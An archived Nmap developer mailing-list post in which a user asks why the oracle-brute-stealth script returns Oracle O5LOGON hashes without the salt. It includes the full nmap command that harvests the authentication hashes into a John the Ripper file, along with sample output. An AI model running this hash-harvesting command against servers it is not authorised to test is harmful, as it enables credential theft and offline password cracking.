Nmap Development mailing list archives

Previous By Date Next
Previous By Thread Next

oracle-brute-stealth script hash but no salt

From: "Milliron, Brian" <B3MR () pge com>
Date: Wed, 16 Jul 2014 00:13:20 +0000
I'm using the oracle-brute-stealth script against an Oracle server my vuln scanners have identified as vulnerable to 
this exploit.  I get the expected hashes in response, but without the salt.  Is it possible there is no salt?  Some 
information is missing maybe?  Am I missing some support library?  Is the TNS session getting mangled?  Hopefully 
someone here can shed some light on the situation.

nmap -p 1521 --script oracle-brute-stealth --script-args 
oracle-brute-stealth.sid=ORCL,oracle-brute-stealth.johnfile=o5logon.john 1.2.3.4

Starting Nmap 6.46 ( http://nmap.org ) at 2014-07-15 16:39 PDT
Nmap scan report for myhost (1.2.3.4)
Host is up (0.0013s latency).
PORT     STATE SERVICE
1521/tcp open  oracle
| oracle-brute-stealth:
|   Accounts
|     AASH:$o5logon$ A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2A1B2* - Hashed valid or invalid 
credentials


PG&E is committed to protecting our customers' privacy. 
To learn more, please visit http://www.pge.com/about/company/privacy/customer/
_______________________________________________
Sent through the dev mailing list
http://nmap.org/mailman/listinfo/dev
Archived at http://seclists.org/nmap-dev/
Previous By Date Next
Previous By Thread Next

Current thread: